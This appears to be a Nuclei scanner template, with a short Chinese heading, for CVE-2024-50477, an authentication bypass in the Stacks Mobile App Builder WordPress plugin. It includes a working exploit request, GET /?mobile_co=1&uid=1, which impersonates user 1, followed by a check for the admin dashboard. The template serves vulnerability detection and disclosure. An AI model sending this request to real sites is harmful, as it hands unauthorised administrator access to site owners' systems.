漏洞描述
Stacks Mobile App Builder WordPress plugin ≤ 5.2.3 suffers from an authentication bypass vulnerability via improper handling of query parameters, allowing attackers to impersonate arbitrary users.
id: CVE-2024-50477
info:
name: WordPress Stacks Mobile App Builder <=5.2.3 - Authentication Bypass
author: stealthcopter,vijay-sutar
severity: critical
description: |
Stacks Mobile App Builder WordPress plugin ≤ 5.2.3 suffers from an authentication bypass vulnerability via improper handling of query parameters, allowing attackers to impersonate arbitrary users.
reference:
- https://github.com/stealthcopter/wordpress-hacking/blob/main/reports/stacks-mobile-app-builder-priv-esc/stacks-mobile-app-builder-priv-esc.md
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stacks-mobile-app-builder/stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover
- https://patchstack.com/database/vulnerability/stacks-mobile-app-builder/wordpress-stacks-mobile-app-builder-plugin-5-2-3-account-takeover-vulnerability?_s_id=cve
- https://github.com/RandomRobbieBF/CVE-2024-50477
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-50477
cwe-id: CWE-288,CWE-306
epss-score: 0.7945
epss-percentile: 0.99051
cpe: cpe:2.3:a:stacksmarket:stacks_mobile_app_builder:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: stacks
product: stacks_mobile_app_builder
framework: wordpress
tags: cve,cve2024,wordpress,auth-bypass,account-takeover,wp-plugin,stacks
http:
- raw:
- |
GET /wp-content/plugins/stacks-mobile-app-builder/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Stacks Mobile App Builder")'
condition: and
internal: true
- raw:
- |
GET /?mobile_co=1&uid=1 HTTP/1.1
Host: {{Hostname}}
- raw:
- |
POST /wp-admin/index.php HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "Dashboard","Plugins","Edit Profile")'
condition: and
# digest: 490a0046304402202158b4978fe520da2f30fbe9c85b467f62253e43777bcaaaad6ba81b0046fd7a0220549492c52d14d77594615cedf7033529d6496d3a02d733375a718b2972e13f5b:922c64590222798bb761d5b6d8e72950